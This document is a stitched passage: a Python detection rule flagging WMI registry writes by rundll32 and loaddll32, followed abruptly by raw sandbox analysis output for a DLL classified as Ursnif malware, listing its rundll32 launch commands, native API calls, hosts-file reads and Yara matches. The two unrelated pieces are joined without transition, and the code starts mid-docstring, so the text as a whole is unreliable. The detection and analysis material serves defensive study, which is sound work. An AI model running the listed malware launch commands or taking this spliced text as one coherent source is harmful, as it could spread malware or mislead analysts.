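process/operation event records below are constructed, and the process
allowlist and host list are assumptions to tune per environment."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Optional 'Start ' prefix is an assumption about how some event sources word the operation.
WMI_EXEC_METHOD = re.compile(
    r"^(?:Start )?IWbemServices::ExecMethod - (?P<namespace>\S+) : (?P<cls>\w+)::(?P<method>\w+)$"
)

# Methods of the StdRegProv class, split by their effect on the registry.
STDREGPROV_WRITE = {
    "CreateKey", "DeleteKey", "DeleteValue", "SetBinaryValue", "SetDWORDValue",
    "SetExpandedStringValue", "SetMultiStringValue", "SetQWORDValue",
    "SetSecurityDescriptor", "SetStringValue",
}
STDREGPROV_READ = {
    "CheckAccess", "EnumKey", "EnumValues", "GetBinaryValue", "GetDWORDValue",
    "GetExpandedStringValue", "GetMultiStringValue", "GetQWORDValue",
    "GetSecurityDescriptor", "GetStringValue",
}

# Assumed baselines: processes expected to write the registry via WMI, and
# DLL/script hosts that have no business calling StdRegProv at all.
ALLOWED_REGISTRY_WRITERS = {"powershell.exe", "pwsh.exe", "wmic.exe", "ccmexec.exe"}
SUSPICIOUS_HOSTS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "loaddll32.exe"}


@dataclass(frozen=True)
class WmiOp:
    namespace: str
    cls: str
    method: str


def parse_operation(operation: str) -> WmiOp | None:
    """Parse an ExecMethod operation string; other WMI calls return None."""
    m = WMI_EXEC_METHOD.match(operation.strip())
    if m is None:
        return None
    return WmiOp(m["namespace"].lower(), m["cls"], m["method"])


def classify_registry_op(op: WmiOp) -> str | None:
    """'write' or 'read' for StdRegProv calls, None for any other class or method."""
    if op.cls != "StdRegProv":
        return None
    if op.method in STDREGPROV_WRITE:
        return "write"
    if op.method in STDREGPROV_READ:
        return "read"
    return None


def evaluate(events: list[tuple[str, str]]) -> list[dict]:
    """Run the rule over (process image, operation) pairs and return alert records."""
    alerts = []
    for image, operation in events:
        op = parse_operation(operation)
        if op is None:
            continue
        kind = classify_registry_op(op)
        if kind is None:
            continue
        image_name = image.rsplit("\\", 1)[-1].lower()
        if kind == "write" and image_name not in ALLOWED_REGISTRY_WRITERS:
            severity = "high"
        elif image_name in SUSPICIOUS_HOSTS:
            severity = "medium"
        else:
            continue
        alerts.append({"process": image, "namespace": op.namespace,
                       "method": op.method, "kind": kind, "severity": severity})
    return alerts


# Constructed events. The first three mirror the report's WMI lines; the rest are
# made-up benign activity that the rule must not flag.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\loaddll32.exe",
     r"IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue"),
    (r"C:\Windows\System32\loaddll32.exe",
     r"IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue"),
    (r"C:\Windows\SysWOW64\rundll32.exe",
     r"IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue"),
    (r"C:\Windows\System32\wbem\WMIC.exe",
     r"IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process"),
    (r"C:\Windows\System32\svchost.exe",
     r"IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create"),
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['process']} -> "
              f"{alert['namespace']}:StdRegProv::{alert['method']} ({alert['kind']})")
```

The read from `loaddll32.exe` only rates medium on its own; it is the `Set*Value` calls from a host that never legitimately writes the registry through WMI that carry the alert, which matches how the report itself separates "reads or writes" from "writes".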
                      Source: 6yDD19jMIu.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 892
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE21B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00754C40
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0075664C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00752B76
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0075954A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0075AF24
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00757DEC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECF5600
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED2B597
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED3A2B1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED1E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012BAF24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012B2B76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012B4C40
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ECF5600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED2D630
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED43CCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED2B597
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED3A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED1E8C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6ED1ABD1 appears 91 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6ED1ABD1 appears 91 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE1273 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE13B8 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE23D5 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00755D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0075B149 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012B5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012BB149 NtQueryVirtualMemory,
                      Source: 6yDD19jMIu.dllVirustotal: Detection: 9%
                      Source: 6yDD19jMIu.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 892
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 636
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 872
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER618E.tmpJump to behavior
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@14/12@14/7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00754A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4680
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3056
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6048
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: 6yDD19jMIu.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 6yDD19jMIu.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.480895631.00000000036B4000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.482429181.0000000004AE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.500262352.0000000004CE3000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdbQ source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000013.00000003.499906922.0000000004E52000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516748528.00000000050B1000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.504088333.0000000000CFC000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000013.00000003.499906922.0000000004E52000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516748528.00000000050B1000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdbE source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.481849190.00000000036BA000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.503709261.0000000000D08000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbI source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000012.00000003.482428909.00000000036AE000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.504088333.0000000000CFC000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdbC source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.645023107.000000006ED5B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645833298.000000006ED5B000.00000002.00020000.sdmp, 6yDD19jMIu.dll
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbw source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000012.00000003.481849190.00000000036BA000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.503709261.0000000000D08000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb_ source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000012.00000003.480895631.00000000036B4000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.501149079.0000000000D02000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6ECE2150 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6ECE21A3 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0075AF13 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0075ABE0 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6ED1AB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_012BAF13 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_012BABE0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6ED1AB9A push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6ECE1DE5 LoadLibraryA,GetProcAddress,

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: Yara match File source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, type: MEMORY
